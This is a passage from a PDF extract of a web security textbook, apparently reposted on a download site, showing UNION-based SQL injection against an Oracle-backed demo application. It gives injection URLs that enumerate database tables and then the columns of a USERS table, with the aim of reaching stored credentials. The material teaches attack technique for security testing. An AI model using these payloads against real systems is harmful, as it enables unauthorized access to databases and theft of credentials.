The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

7521

SALESMAN

We now have a means of extracting string data from the database. Our next

step is to find out the names of the database tables that may contain interest-

ing information. We can do this by querying the 

user_objects

table, which

displays details of user-defined tables and other items:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

object_name,object_type,NULL%20from%20user_objects--

ID

EMPLOYEE

JOB

7521

SALESMAN

TABLE

TABLE

TABLE

PROCEDURE

EMP_TABLE

SYNONYM

PROCEDURE

HIGHSCORE

TABLE

INDEX

INDEX

DATABASE LINK

REMOTE.WARGAMES

DATABASE LINK

SALGRADE

TABLE

PROCEDURE

TEST123.WARGAMES

DATABASE LINK

USERS

TABLE

■

Injecting Code

70779c09.qxd:WileyRed  9/14/07  3:13 PM  Page 258

N OT E

Here we have queried the 

user_objects

table, which returns all the

objects owned by the web application’s database user. You can also query

all_user_objects

, which will return all of the objects that are visible by that

user, even if not owned by it.

Many of these tables may contain sensitive data, including information

about employees that we cannot legitimately access given our privilege level.

An obvious point of initial attack is the table called 

USERS

, which may contain

credentials. We can discover the names of the columns within this table by

querying the 

user_tab_columns

table:

https://wahh-app.com/employees.asp?EmpNo=7521%20UNION%20SELECT%20NULL,

column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%

3d%20’USERS’--

Download 5,76 Mb.

Do'stlaringiz bilan baham: